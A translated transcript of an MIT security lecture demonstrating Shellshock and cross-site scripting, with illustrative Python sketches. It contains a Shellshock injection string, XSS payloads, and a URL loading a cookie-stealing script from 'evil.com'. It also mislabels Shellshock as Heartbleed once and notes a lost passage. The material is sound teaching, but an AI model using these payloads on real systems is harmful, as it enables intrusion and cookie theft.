MIT course "Computer Systems Security". Lecture 9: "Web Application Security", part 1

Massachusetts Institute of Technology. Lecture course # 6.858. "Computer Systems Security". Nickolai Zeldovich, James Mickens. 2014

Computer Systems Security is a course on the design and implementation of secure computer systems. Lectures cover threat models, attacks that compromise security, and techniques for achieving security based on recent research. Topics include operating system (OS) security, capabilities, information flow control, language security, network protocols, hardware protection and security in web applications.

Lecture 1: "Introduction: threat models" Part 1 / Part 2 / Part 3
Lecture 2: "Control hijacking attacks" Part 1 / Part 2 / Part 3
Lecture 3: "Buffer overflow: exploits and protection" Part 1 / Part 2 / Part 3
Lecture 4: "Separation of privileges" Part 1 / Part 2 / Part 3
Lecture 5: "Where Security Errors Come From" Part 1 / Part 2
Lecture 6: "Capabilities" Part 1 / Part 2 / Part 3
Lecture 7: "Sandbox Native Client" Part 1 / Part 2 / Part 3
Lecture 8: "Model of network security" Part 1 / Part 2 / Part 3
Lecture 9: "Web Application Security" Part 1 / Part 2 / Part 3

Let's begin the second lecture in our thrilling series on web security. I would like to go straight to a quick demo, since, as you know, our demos almost never work. I hope that today you will not be looking at a blank screen.

First I would like to show you an example of the Shellshock bug, which you may have already heard about. It has been quite a popular topic in the computer security literature.

People give the Heartbleed bug the maximum rating on the severity scale, 10 out of 10. They consider it the most dangerous kind of bug that a security system has to defend against. I thought it would be a great idea to show you a piece of living history of this issue, one you can tell your parents about so that they understand that studying at the Massachusetts Institute of Technology is worth the money.

So what is the basic idea behind the Shellshock bug? It is a really great example of why it is so difficult to build secure web applications that span multiple technologies, multiple languages, multiple operating systems, and so on. The basic idea is that Shellshock exploits the fact that an attacker can craft a special HTTP request to a server and control the headers in that request. I wrote a very simple example on the board.
Suppose an attacker wants to send a GET request to some CGI script to search for cats, because that is exactly what people are always looking for on the Internet (just kidding). So there is a question mark followed by the query, and then a standard Host header, for example example.com:

GET /querry.cgi?search=cats
Host: example.com
Custom-header: Custom-value

Now note that the attacker can also specify custom headers. For example, here I have an application-specific header called Custom-header with the value Custom-value, because a web application may define functionality that cannot be expressed with the simple predefined HTTP headers. So far all of this seems pretty harmless.
But it turns out that many web servers that handle CGI scripts will take these custom headers and use them to set Bash environment variables. That is, they use the header name, Custom-header, to form the name of a Bash variable, and they take the attacker-supplied Custom-value and use it as the value of that variable. Once the variable is set, the CGI server does some processing in the context of that environment.
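The header-to-variable mapping described above can be sketched in a few lines of Python. This is only an illustration of the usual CGI convention (upper-case the header name, replace "-" with "_", prefix it with HTTP_); the function names header_to_env_name and build_cgi_env are hypothetical and do not come from the lecture.

```python
def header_to_env_name(header_name: str) -> str:
    """Map an HTTP header name to a CGI-style environment variable name."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def build_cgi_env(headers: dict) -> dict:
    """Build the environment a CGI server would hand to a script.

    The values are copied verbatim, so whoever sent the request
    controls the contents of these variables.
    """
    return {header_to_env_name(name): value for name, value in headers.items()}


# The request from the board, expressed as a dictionary of headers.
env = build_cgi_env({"Host": "example.com", "Custom-header": "Custom-value"})
print(env)
```

The point of the sketch is that nothing in this step inspects the value: the attacker's text arrives in the environment unchanged.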

And this is bad, because web servers should not take arbitrary values from random untrusted sources. In the specific case of the Shellshock bug, if you put a certain malicious value into a Bash variable, real craziness can begin.

Basically, this malicious value is written as a function definition in the Bash scripting language, and you do not need to worry about the specifics. The point is that if Bash handled it correctly, the /bin/id part would never be executed. You would simply have defined some silly function that does nothing, and processing would stop there.

However, this sequence of characters confuses the Bash parser; it seems to stumble over this nonsense. And then it says, "oh, I could keep parsing and execute some commands here, couldn't I?" In this case it simply executes /bin/id, which prints some information about the user. But the essence of the vulnerability is that instead of /bin/id you can put absolutely any code here!
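The value written on the board is not reproduced in this transcript, so the sketch below uses the widely published shape of a Shellshock test string as an assumption: an empty function definition followed by extra text. Before the fix, Bash treated an environment variable whose value starts with "() {" as a function definition and kept executing whatever followed the function body. The helper names are hypothetical, and the code only builds and inspects strings; it never invokes a shell.

```python
FUNCTION_PREFIX = "() {"  # marker Bash used for a function stored in a variable


def make_shellshock_value(trailing_command: str) -> str:
    """Empty function body, then text that should never have been executed."""
    return "() { :; }; " + trailing_command


def looks_like_function_definition(value: str) -> bool:
    """True if an unpatched Bash would try to parse this value as a function."""
    return value.lstrip().startswith(FUNCTION_PREFIX)


def trailing_text(value: str) -> str:
    """Return whatever follows the end of the function body ('};')."""
    _, separator, rest = value.partition("};")
    return rest.strip() if separator else ""


value = make_shellshock_value("/bin/id")
print(value)
print(looks_like_function_definition(value), trailing_text(value))
```

A server-side check like looks_like_function_definition is only a rough illustration of what the parser stumbles over; the real fix was in Bash itself.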

I will give a very simple example that you can see on the screen. This is a very simple Python server, about the simplest one you can imagine. It implements the GET handler, and this handler iterates over all the HTTP headers in the request.

For each header we have a name k and a value v. The GET handler simply prints the headers it finds.

And then it does something very stupid: it makes a system call and sets a shell variable directly to the value given in the header. That is the whole root of the vulnerability.

If I go to the next tab and start the victim web server, we see that it is ready to accept requests.

Then I can write my special Shellshock client, which is in the next tab.

In fact, it is quite simple: I just define one of these malicious strings, attack.str, which starts with those "curly" values. And then I know that on the server side whatever follows will be executed at my will.

In this case I used something harmless: echo "I own your car." But it could be anything. You could launch another Bash shell with "echo ATTACKER CMD" standing in for a real attacker command, which could be very dangerous.

So, I set up the headers and the request, and then I just use Python to create an HTTP connection and send it to the server. So what happens in the end? Here I run my Shellshock client.

You can see that a 404 error came back, because it does not matter which file I request; I just asked for some nonexistent index HTML file. But if you look at the second tab, where the victim web server is accepting connections on port 8282, you will see that it printed my messages "I own your car" and ATTACKER CMD.

Because as soon as the victim server received this header, it set the value of the Bash variable, and as a result the ATTACKER CMD command was run. Is that clear?

Audience: so this happens when a program is started with this header?

Professor: yes. The specifics of how the attack works depend on what your web server looks like, for example whether you are running Apache or not. This example is a bit contrived, since I actually spawned another Bash shell, set a shell variable, and only then started the process. But you can imagine that if you spawned other processes for each incoming connection, you could set the environment variable directly.

Audience: if you go back to the web server code, it seems to have a much worse vulnerability than Shellshock. You can make the system call execute a command just by setting a custom header to something else, so you would not even need the Shellshock bug in this example.

Professor: yes, that's right. This particular web server, which I wrote just as an example, should not be trusted with anything. But if we had Apache instead of Python, we could set the environment value for a particular service directly, using something like setenv. And there are servers, like this one, that spawn a separate process and do something very similar to this example.
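The difference raised in this exchange, between pasting a header into a shell command line and setting the environment of a child process directly, can be sketched as follows. The professor's actual server code is not shown in the transcript, so unsafe_command_line is a hypothetical reconstruction of the pattern, and ./handler is a made-up program name. The string is only built, never executed.

```python
import os
import shlex
import subprocess
import sys


def unsafe_command_line(name: str, value: str) -> str:
    """Pattern to avoid: header text pasted straight into shell syntax."""
    return f"export {name}={value}; ./handler"  # './handler' is hypothetical


def run_child_with_env(name: str, value: str) -> str:
    """Pass the value through the child's environment, with no shell involved."""
    env = dict(os.environ)
    env[name] = value
    child_code = "import os, sys; sys.stdout.write(os.environ[sys.argv[1]])"
    result = subprocess.run(
        [sys.executable, "-c", child_code, name],
        env=env, capture_output=True, text=True, check=True,
    )
    return result.stdout


header_value = "x; echo INJECTED"
# A shell would read this as three commands, one of them chosen by the attacker.
print(unsafe_command_line("HTTP_CUSTOM_HEADER", header_value))
# Quoting keeps the value a single shell word if a shell cannot be avoided.
print(shlex.quote(header_value))
# Without a shell, the child simply sees the text as data.
print(run_child_with_env("HTTP_CUSTOM_HEADER", header_value))
```

Note that setting the environment directly only removes the plain command injection; if the child process were an unpatched Bash, the Shellshock parsing problem would still apply to the value.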

Another example I wanted to show you is cross-site scripting. The Shellshock bug was an example of how important content sanitization is. We discussed the fact that you should not just accept input from random people and use it directly in commands of any kind.

Cross-site scripting is another example of how this can go wrong. Here I have another simple CGI server written in Python.

This is the handler that is executed when a request arrives from a client. Here I print some headers for the response, and my response will be HTML text. As it turns out, browsers have some security mechanisms that try to prevent the attack I am about to show you. So I disable some of these protection mechanisms by putting this header line at the top.

The CGI script then reads all the CGI fields of the query, starting with the line form = cgi.FieldStorage(). Think of everything after the question mark in the request line as the parameters in our example:

GET /querry.cgi?search=cats
Host: example.com
Custom-header: Custom-value

Next, the CGI script does a very simple thing: it immediately prints the value that came from the attacker. It is the same basic idea, and it is a bad idea, because this print writes the received value directly into the HTML itself.
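A minimal sketch of this pattern, and of the obvious repair, is shown below. It is not the script from the demo: the query is parsed with urllib.parse.parse_qs as a stand-in for cgi.FieldStorage, the parameter name message is taken from the walkthrough that follows, and the function names render_unsafe and render_escaped are hypothetical.

```python
import html
from urllib.parse import parse_qs


def get_message(query_string: str) -> str:
    """Extract the 'message' parameter from the part of the URL after '?'."""
    return parse_qs(query_string).get("message", [""])[0]


def render_unsafe(query_string: str) -> str:
    """What the demo does: attacker-supplied text goes straight into the page."""
    return "<html><body>" + get_message(query_string) + "</body></html>"


def render_escaped(query_string: str) -> str:
    """Same page, but the value is encoded so it stays text instead of markup."""
    return "<html><body>" + html.escape(get_message(query_string)) + "</body></html>"


attack = 'message=<script>alert("XSS")</script>'
print(render_unsafe(attack))   # the script tag reaches the page intact
print(render_escaped(attack))  # the angle brackets become &lt; and &gt;
```

With a harmless value such as message=hello, both versions produce the same page, which is why the flaw is easy to miss.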

Here is what can happen. Suppose I have a bunch of requests that I want to run. In the first request I simply set the message value to hello, that is, I go to the URL on the first line.

So if I load my page, I see the word hello on it, because the server takes exactly what I give it and prints "hello". No surprises there.

I realize that I can actually send arbitrary HTML there. If I wrap the word in h1 tags, that is, if I send the server the second line, the page changes: see, the word is now rendered in the h1 heading style. So it works, I am writing values directly into the page.

Great, now we're in business, and that's cool. Now let's just add some JavaScript, that is, load the third string I prepared, which inserts a script that calls alert("XSS").

Now we see a blank screen. It seems we did not succeed: no output is visible, and I did not see any alert.

But if I look at the output of the web server, I see that the web server itself never actually received that closing script tag. It seems the browser itself somehow detected something evil, even though I tried to disable the XSS filter. That is quite interesting. Later we will look at this protection mechanism more closely, but for now I will just note that the browser is trying to resist the cross-site scripting attack.

But you can take advantage of the fact that HTML, CSS and JavaScript are extremely complex languages, and that they combine in ways that are hard to understand. I will exploit this with the last, fourth line in my notes, pasting it into the browser's address bar. This is an attack string containing malformed markup. It includes an image tag, <IMG """>, followed by the script tag and a trailing ">, and it cannot really be parsed. On receiving such a string the browser simply gets confused and displays: "The page at 127.0.0.1:8282 says: XSS". So the built-in cross-site scripting protection does not actually work.

If we click the "OK" button, we are left with a blank page. But if you look at its contents, you will see stray quotes and brackets that seem to come from nowhere.

However, from the attacker's point of view the mangled page does not matter, because we saw the alert, which means the code ran. And it could have been used to steal cookies or do something similar.

Audience: what is the cross-site aspect?

Professor: the cross-site aspect is that if an attacker can convince a user to visit a URL like the one in this example, then the attacker is the one who determines the content of the message. It is the attacker who creates the XSS alert or whatever else. In essence, the victim's page executes code on behalf of someone who does not control that page.

So, I showed you two quick demos of the "dirty" world we live in. Why is cross-site scripting so common? Why do these issues matter so much? The reason is that websites are becoming more and more dynamic, and they want to host content from many users or include content from other domains. Think, for example, of the comment section of a news article: those comments come from untrusted people, the users. One way or another, these sites need to figure out the rules for combining such things.

Websites may also contain user documents, such as Google or Office 365 documents. All of these documents come from untrusted people, but somehow they must coexist with each other and with the large Google or Microsoft infrastructure.

What kinds of defenses against cross-site scripting can we use? One kind is the cross-site scripting filters in the browser itself. These filters try to detect possible cross-site scripting attacks. And we saw one of these filters in action, in the third example that we tried.
Suppose you have the URL foo.com/?q=<script src="evil.com/cookie stealer.js">. That is, this URL tries to make the page load a script from a malicious site that steals the user's cookies.

So the browser refuses to execute it, and this attacker trick does not work. The reason is simple: the browser checked whether there is an embedded <script> in the URL and, on finding one, refused to go along with it. This is a very simple heuristic for detecting that something harmful is going on, because no normal developer would put such things in a URL. There are browser configuration options for turning this on and off. Sometimes that is useful for testing, if you just want to quickly inject some JavaScript without the check getting in the way. But usually this check is enabled by default.

For example, Chrome and IE have a built-in filter that looks at the URL in the address bar and searches for such things. If they are there, the browser may try to remove them completely or make the source inside the <> empty. There are many heuristics that browsers use to detect such things. And if you look at the OWASP site, it collects examples of such heuristics for detecting cross-site scripting, along with examples of how to bypass these filters.

You know, it was very funny, because at first I tried something like this as an example for our lecture, and it did not work. Then I looked at the OWASP cheat sheet and found the fourth variant, which did work: the example with the broken parsing of the img tag.

So the main problem, which keeps us from simply relying on the browser's built-in filters, is that there are many different ways to get the CSS and HTML parsers to parse some content in unexpected ways. The built-in solutions are not perfect and do not cover all vulnerabilities.
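To make the weakness of such heuristics concrete, here is a deliberately naive filter in Python. It is an assumption-laden toy, far simpler than what any real browser shipped: it decodes the URL and looks for an opening script tag. The name naive_filter_blocks is hypothetical, and the bypass shown is a common event-handler vector rather than the malformed IMG string from the demo.

```python
import re
from urllib.parse import unquote

# Matches "<script", allowing whitespace after "<" and any letter case.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def naive_filter_blocks(url: str) -> bool:
    """Return True if the URL, after percent-decoding, contains a script tag."""
    return bool(SCRIPT_TAG.search(unquote(url)))


candidates = [
    'foo.com/?q=<script src="evil.com/x.js">',     # plain script tag
    "foo.com/?q=%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E",  # percent-encoded, upper case
    "foo.com/?q=<img src=x onerror=alert(1)>",      # no script tag at all
    "foo.com/?q=cats",                               # ordinary query
]
for url in candidates:
    print(naive_filter_blocks(url), url)
```

The third URL runs JavaScript through an event handler attribute and passes the check untouched, which is the general shape of the problem: every pattern the filter adds leaves some other parse path uncovered.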

Audience: but surely checking such things is not the browser's responsibility?

Professor: I mean the case where the browser is behind a proxy server, and the proxy does something like what is shown in this example. The built-in filters make sense because there can be many parsers inside the browser, and these filters are there to protect the processing layers inside the browser.

Audience: I think you could say that it is the web developer's responsibility, not the user's, to check such things.

Professor: in a certain sense, you could say the same about Unix or Windows: there are also things there that the software developer, not the user, should take care of, and the developer must make sure those things stay isolated. But in fact the OS and the hardware also play an important role, because otherwise you could not trust any programs written by random developers. But basically you are right. In fact, frameworks such as Django try to help you avoid some of these problems.

However, filters are not a perfect solution, and they cannot prevent what are known as persistent, or stored, cross-site scripting attacks. What I showed you was a reflected attack, because the script code simply "lives" in the URL. As soon as the user closes that URL, the attack is over.

But imagine that a user has put malicious HTML in the comments section of your site. If the server treats this comment as valid and accepts it, then the comment with its malicious payload will live there forever. And every user who visits a page with this comment will be exposed to the malicious content.
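The persistence described here can be sketched with a tiny in-memory comment store. The class CommentStore and its methods are hypothetical stand-ins for a real site's database and page rendering; the sketch only shows that a payload stored once is served to every later visitor unless it is encoded on output.

```python
import html


class CommentStore:
    """Toy stand-in for a comments table: stores text exactly as submitted."""

    def __init__(self):
        self._comments = []

    def add(self, text: str) -> None:
        self._comments.append(text)

    def render_unsafe(self) -> str:
        """Every visitor receives the stored markup as part of the page."""
        items = "".join(f"<li>{c}</li>" for c in self._comments)
        return f"<ul>{items}</ul>"

    def render_escaped(self) -> str:
        """Stored text is encoded at output time, so it is displayed, not run."""
        items = "".join(f"<li>{html.escape(c)}</li>" for c in self._comments)
        return f"<ul>{items}</ul>"


store = CommentStore()
store.add("Nice article!")
store.add("<script>alert('XSS')</script>")

# The same stored comment is returned on every page load, for every user.
first_visit = store.render_unsafe()
second_visit = store.render_unsafe()
print(first_visit == second_visit)
print(store.render_escaped())
```

Unlike the reflected case, nothing suspicious appears in the victim's URL, which is why a filter that inspects the address bar has nothing to match against.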

Another example, funny and sad at the same time, is dating sites. Some dating sites actually let users put full HTML content in their profiles.

So what does this mean? When someone lonely is looking for a soul mate and comes to your profile, their browser will run the HTML you created in the context of their session, and this can have very destructive consequences. The built-in filters do not protect against such things.

Audience: so in the comments section, the attacker presumably submits a message where the data goes to the server in a message variable or something like that?

Professor: there are many different ways you can imagine. For example, it could be a POST, or an XMLHttpRequest.

[The rest of this exchange and the passage that follows did not survive in this copy of the transcript. The fragments that remain mention HTTP-only cookies and JavaScript access to cookies, attacker-crafted URLs (buy.com, a Ferrari), CSRF, Google and Office 365 user content, googleusercontent.com, Gmail and google.com, and Django templates compared with a plain CGI script.]

However, Django does much better: it sanitizes user content, because it expects tricks from it. It places the value of the name variable right here, but encodes it in such a way that the content can never escape the HTML context and execute JavaScript or anything like that.
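The template from the slide is not reproduced in this transcript, so the sketch below is a stand-in rather than Django itself. It imitates one behavior of Django templates, namely that a {{ name }} placeholder is HTML-escaped by default, using a hypothetical render function built only on the Python standard library.

```python
import html
import re

# Matches placeholders of the form {{ name }}.
PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render(template: str, context: dict) -> str:
    """Fill in placeholders, HTML-escaping every substituted value."""
    def substitute(match):
        value = context.get(match.group(1), "")
        return html.escape(str(value))
    return PLACEHOLDER.sub(substitute, template)


template = "<b>Hello {{ name }}</b>"
print(render(template, {"name": "Alice"}))
print(render(template, {"name": "<script>alert(1)</script>"}))
```

The design point is that escaping is the default rather than something the developer must remember at each print statement, which is the difference from the CGI script shown earlier.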


MIT course "Computer Systems Security". Lecture 9: "Web Application Security", part 2


Source: https://habr.com/ru/post/424289/
